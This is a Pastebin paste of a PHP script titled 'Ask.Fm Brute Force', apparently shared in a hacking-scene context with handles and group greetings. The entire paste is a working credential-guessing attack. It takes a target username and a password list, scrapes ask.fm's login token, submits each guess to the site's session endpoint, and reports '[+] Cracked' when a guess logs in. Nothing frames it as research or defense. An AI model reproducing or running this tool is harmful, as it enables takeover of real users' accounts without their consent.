Advertisement
Ribang

Ask.Fm Brute Force By xSecurity

Feb 4th, 2018
528
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
  1. <?
  2. # Coded By : xSecurity
  3. # Skype : xSecur1ty
  4. # Greet'z : b0x - NeoDz - DamaneDz - b0x - Rab3oun - r0kin - No-QRQR - PeRsTiGe511 - bllwh
  5. echo "<form method='POST'><title>Ask.Fm Brute Force</title><center>
  6. <font face='Tahoma' size='5' color='darkred'><b>Ask.Fm</b></font><font face='Tahoma' size='2'><b> Brute Force</b><br>
  7. <input name='username' placeholder='username'><br>
  8. <textarea cols='20' rows='15' name='pass'></textarea><br>
  9. <input type='submit' value='Brute' /><br></form>";
  10. @set_time_limit(0);
  11. @error_reporting(0);
  12. $site = "http://ask.fm/login/";
  13. $username = $_POST['username'];
  14. $passl = explode("\r\n", $_POST['pass']);
  15. foreach($passl as $pass)
  16. {
  17. $hash = token($site);
  18. $x = brute($hash,$username,$pass);
  19. if(preg_match('#<form action="/logout" method="post">#', $x))
  20. {
  21. //print $x;
  22. print "<br>[+] Cracked : <font face='Tahoma' size='2' color='red'><b>{$username}</b></font> / <font face='Tahoma' size='2' color='red'><b>{$pass}</b></font><br>";
  23. flush();flush();
  24. break;
  25. }
  26. }
  27. # extract auth_token
  28. function token($site)
  29. {
  30. $curl = curl_init();
  31. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  32. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  33. curl_setopt($curl, CURLOPT_URL, $site);
  34. curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  35. curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  36. $b0x = curl_exec($curl);
  37. preg_match('/<input name="authenticity_token" type="hidden" value="(.*?)" /' ,$b0x ,$token);
  38. return $token[1];
  39. }
  40.  
  41. # brute
  42. function brute($hash,$username,$pass)
  43. {
  44. $curl = curl_init();
  45. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  46. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  47. curl_setopt($curl, CURLOPT_URL, "http://ask.fm/session");
  48. curl_setopt($curl, CURLOPT_POSTFIELDS, "authenticity_token={$hash}&login={$username}&password={$pass}&commit=Log+in");
  49. curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  50. curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  51. $brute = curl_exec($curl);
  52. return $brute;
  53. }
  54. @system("del cookie.txt");
  55. @system("rm cookie.txt");
  56. echo "<br><br><font face='Tahoma' size='2'>[+] Coded By : xSecurity | Homepage: Sec4ever.CoM <br> Greet'z : b0x - NeoDz - DamaneDz - b0x - RAB3OUN - r0kin - No-QRQR - PeRsTiGe511 - bllwh</font>";
  57. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement